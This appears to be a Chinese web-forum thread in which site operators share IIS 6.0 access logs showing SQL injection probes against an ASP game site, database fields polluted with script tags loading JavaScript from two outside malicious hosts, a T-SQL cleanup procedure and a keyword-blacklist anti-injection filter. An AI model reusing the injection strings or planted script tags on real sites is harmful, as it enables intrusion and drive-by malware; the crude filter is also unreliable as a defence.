2009-02-12 06:37:25 W3SVC53 203.169.145.67 GET /Users/UserViewNews.asp |54|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]在关键字_'And'_附近有语法错误。 80 - 66.249.67.137 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) 200 0 0 6750
2009-02-12 06:37:57 W3SVC53 203.169.145.67 GET /robots.txt - 80 - 76.13.20.115 Mozilla/5.0+(Yahoo-MMCrawler/4.0;+mailto:[email protected]) 200 0 0 1487
2009-02-12 06:37:59 W3SVC53 203.169.145.67 GET /Admin/SutraGamePic/2007726162818.jpg - 80 - 76.13.20.115 Mozilla/5.0+(Yahoo-MMCrawler/4.0;+mailto:[email protected]) 200 0 0 61239
2009-02-12 06:38:06 W3SVC53 203.169.145.67 GET /Users/UserIndex.asp Flag=1|13|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'='_附近有语法错误。 80 - 66.249.67.137 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) 200 0 0 6058
2009-02-12 08:20:22 W3SVC53 203.169.145.67 GET /adviser.asp Id=15|86|800a0e7d|连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。 80 - 120.84.96.82 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+360SE) 200 0 0 1831
2009-02-12 08:20:22 W3SVC53 203.169.145.67 GET /mainstyle_ce.css - 80 - 120.84.96.82 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+360SE) 200 0 64 2048
2009-02-12 08:29:14 W3SVC53 203.169.145.67 GET /ViewGame.asp |15|800a0e7d|连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。 80 - 60.28.17.35 Baiduspider+(+http://www.baidu.com/search/spider.htm) 200 0 0 968
2009-02-12 08:30:20 W3SVC53 203.169.145.67 GET /adviser.asp Id=14|86|800a0e7d|连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。 80 - 72.30.142.241 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 200 0 0 1957
2009-02-12 14:37:47 W3SVC53 203.169.145.67 GET /game.asp page=3&ClassId='%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''='|129|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 222.88.208.139 Internet+Explorer+6.0 200 0 0 6766
2009-02-12 14:37:48 W3SVC53 203.169.145.67 GET /game.asp page=3&ClassId='%61%6E%64%20%31%3D%31%20and%20''='|129|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 222.88.208.139 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 0
2009-02-12 14:37:48 W3SVC53 203.169.145.67 GET /game.asp page=3&ClassId='%61%6E%64%20%31%3D%32%20and%20''='|129|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 222.88.208.139 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 0
2009-02-12 14:37:53 W3SVC53 203.169.145.67 GET /game.asp page=3&ClassId='%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''='|129|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 222.88.208.139 Internet+Explorer+6.0 200 0 0 6659
2009-02-12 14:37:53 W3SVC53 203.169.145.67 GET /game.asp page=3&ClassId='%61%6E%64%20%31%3D%31%20and%20''='|129|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 222.88.208.139 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 2048
2009-02-12 14:37:53 W3SVC53 203.169.145.67 GET /game.asp page=3&ClassId='%61%6E%64%20%31%3D%32%20and%20''='|129|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 222.88.208.139 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 0
2009-02-12 14:57:22 W3SVC53 203.169.145.67 GET /adviser.asp id=13 80 - 208.80.194.32 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+SIMBAR={B3A893BA-7AD8-4232-92C7-1C1D2C3C79A0}) 200 0 0 29791
2009-02-12 14:57:27 W3SVC53 203.169.145.67 GET /adviser.asp id=16 80 - 208.80.194.32 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.0.3705;+.NET+CLR+1.1.4322;+Media+Center+PC+4.0;+.NET+CLR+2.0.50727;+ZangoToolbar+4.8.3;+.NET+CLR+3.0.04506.30) 200 0 0 31635
#Software: Microsoft Internet Information Services 6.0
我也被这个IP攻击了，一个星期了没解决了，怎么办啊楼主？你的弄好了吗？
QQ281839695
我也碰到过一个类似的问题，数据库中所有表的字符类型的字段中都被注入了一些js代码，后来我们写了个存储过程来清理掉如:
本科<script src=http://cn.daxia123.cn/cn.js></script><script src=http://cn.jxmmtv.com/cn.js></script>
博士<script src=http://cn.daxia123.cn/cn.js></script><script src=http://cn.jxmmtv.com/cn.js></script>
....
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS OFF
GOCREATE          procedure  dt_reset
AS
begin
declare @ls_tablename varchar(100)
declare @ls_fieldname varchar(100)
declare @ls_fieldtype varchar(50)
declare @ls_sql varchar(500)

declare cur_reset cursor for
SELECT Sysobjects.name AS TABLE_NAME,  syscolumns.name AS COLUMN_NAME,
systypes.name AS DATA_TYPE FROM syscolumns
INNER JOIN systypes
    ON syscolumns.xtype = systypes.xtype
    LEFT JOIN sysobjects ON syscolumns.id = sysobjects.id
   LEFT OUTER JOIN sysproperties ON
   ( sysproperties.smallid = syscolumns.colid
     AND sysproperties.id = syscolumns.id)
   LEFT OUTER JOIN syscomments ON syscolumns.cdefault = syscomments.id
   WHERE syscolumns.id IN
    (SELECT id FROM SYSOBJECTS WHERE xtype = 'U'    ) AND (systypes.name <> 'sysname')
    ORDER BY syscolumns.colid;
open cur_reset;
fetch cur_reset into @ls_tablename,@ls_fieldname,@ls_fieldtype;
while @@fetch_status=0 --如果存取成功，则循环
begin

set @ls_fieldtype= lower(@ls_fieldtype)
if @ls_fieldtype='nvarchar' or @ls_fieldtype='varchar' or @ls_fieldtype='text' or @ls_fieldtype='ntext' or @ls_fieldtype='char'
begin
--处理当前表的当前字段的数据
set @ls_sql =  'update ' + @ls_tablename +  ' set '  +  @ls_fieldname +  ' =substring('+@ls_fieldname+',1,CHARINDEX(''<'','+@ls_fieldname+',1) - 1)   where ' + @ls_fieldname + ' like ''%<%>%''' ;
print @ls_sql
EXEC(@ls_sql)
end
--print @as_patno
fetch cur_reset into @ls_tablename,@ls_fieldname,@ls_fieldtype;
end close cur_reset deallocate cur_reset
end
GO
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS ON
GO
共享我改写的防注入程序  Dim Fy_Post,Fy_Get,Fy_cook,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,aa ,bb
On Error Resume Next
Fy_In = "'|exec|insert|select|delete|update|count|chr|truncate|char|declare|script|iframe|char|set|(*)"
aa="heike.txt" '------------------------------------------如入侵记录保存文件 Fy_Inf = split(Fy_In,"|")
'1--------POST部份------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
flyaway1=now()&" "&Request.ServerVariables("REMOTE_ADDR")&","&Request.ServerVariables("URL")&"+'post'+'"& Fy_Inf(Fy_Xh) &"'+"&Fy_post&"+"&replace(Request.Form(Fy_post),"'","(*)")&""
bb=Fy_Inf(Fy_Xh)
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath(aa),8,True)
file.writeline flyaway1
file.close
set file=nothing
set fs=nothing
call aaa()
End If
Next
Next
End If
'2--------GET部份-------------------
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
flyaway2=now()&" "&Request.ServerVariables("REMOTE_ADDR")&","&Request.ServerVariables("URL")&"+'get'+'"& Fy_Inf(Fy_Xh) &"'+"&Fy_get&"+"&replace(Request.QueryString(Fy_get),"'","(*)")&""
bb=Fy_Inf(Fy_Xh)
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath(aa),8,True)
file.writeline flyaway2
file.close
set file=nothing
set fs=nothing
call aaa()
End If
Next
Next
End If
'3--------cookies部份-------------------
If Request.Cookies<>"" Then
For Each Fy_cook In Request.Cookies
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Cookies(Fy_cook)),Fy_Inf(Fy_Xh))<>0 Then
flyaway3=now()&" "&Request.ServerVariables("REMOTE_ADDR")&","&Request.ServerVariables("URL")&"+'cookies'+'"& Fy_Inf(Fy_Xh) &"'+"&Fy_cook&"+"&replace(Request.Cookies(Fy_cook),"'","(*)")&""
bb=Fy_Inf(Fy_Xh)
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath(aa),8,True)
file.writeline flyaway3
file.close
set file=nothing
set fs=nothing
call aaa()
End If
Next
Next
End If
Sub aaa()
Response.Write "您提交参数中包含非法字符--"+replace(bb,"(*)","'")+"  尝试注入，我们已经记录您的提交记录以及ip，数据被保存并提交到网络110系统！ "
Response.Write "<br><hr>"
Response.End
end Sub
这种问题很严重，一般都是网站存在漏洞或者服务器存在漏洞而被攻击了，若需要安全技术服务请联系EMAIL & MSN：[email protected]， 7X24 为您的网站和服务器保驾护航。